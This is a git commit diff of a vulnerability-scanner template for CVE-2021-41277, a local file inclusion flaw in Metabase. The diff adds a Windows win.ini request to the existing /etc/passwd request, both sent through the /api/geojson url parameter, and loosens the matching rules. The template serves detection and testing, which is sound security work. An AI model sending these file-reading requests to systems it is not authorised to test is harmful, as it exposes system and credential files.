added windows payload
parent
6055458148
commit
6878a66f22
|
@ -2,7 +2,7 @@ id: CVE-2021-41277
|
|||
|
||||
info:
|
||||
name: Metabase Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
author: 0x_Akoko,DhiyaneshDK
|
||||
severity: high
|
||||
description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.
|
||||
impact: |
|
||||
|
@ -34,14 +34,20 @@ http:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/geojson?url=file:///etc/passwd"
|
||||
- "{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
# digest: 4a0a0047304502205efeb7e21f10ff6fa5734693840a37ec473c4df8d723b232e3b5f8dd436b60660221008bcd70f933c26ef891376061e2fb69bf54bd9e97b862b13f64aad141894a0ebb:922c64590222798bb761d5b6d8e72950
|
Loading…
Reference in New Issue